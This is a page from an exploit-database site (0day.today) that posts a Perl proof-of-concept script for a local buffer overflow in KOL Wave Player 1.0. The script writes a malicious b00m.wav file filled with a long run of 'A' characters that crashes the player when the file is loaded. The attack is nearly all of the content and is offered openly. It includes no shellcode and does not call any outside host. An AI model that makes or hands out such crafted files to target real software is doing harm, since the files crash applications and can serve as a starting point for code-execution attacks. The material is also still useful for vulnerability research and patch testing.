[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

KOL Wave Player 1.0 (.wav) Local Buffer Overflow PoC

Author
cr4wl3r
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10179
Category
local exploits
Date add
26-01-2010
Platform
unsorted
====================================================
KOL Wave Player 1.0 (.wav) Local Buffer Overflow PoC
====================================================

#!/usr/bin/perl
#########################################################
## Usage-->>file created-->>load file-->>b00m.wav >>>BOOM
#########################################################
 
 
print "#####################################################\n";
print "[!] KOL Wave Player 1.0 (.wav) Local Buffer Overflow PoC\n";
print "#####################################################\n";
 
 
my $boom = "http://"."\x41" x 1337;
my $filename = "b00m.wav";
open (FILE,">$filename");
print FILE "$boom";
print "\nFile successfully created!\n";



#  0day.today [2024-12-26]  #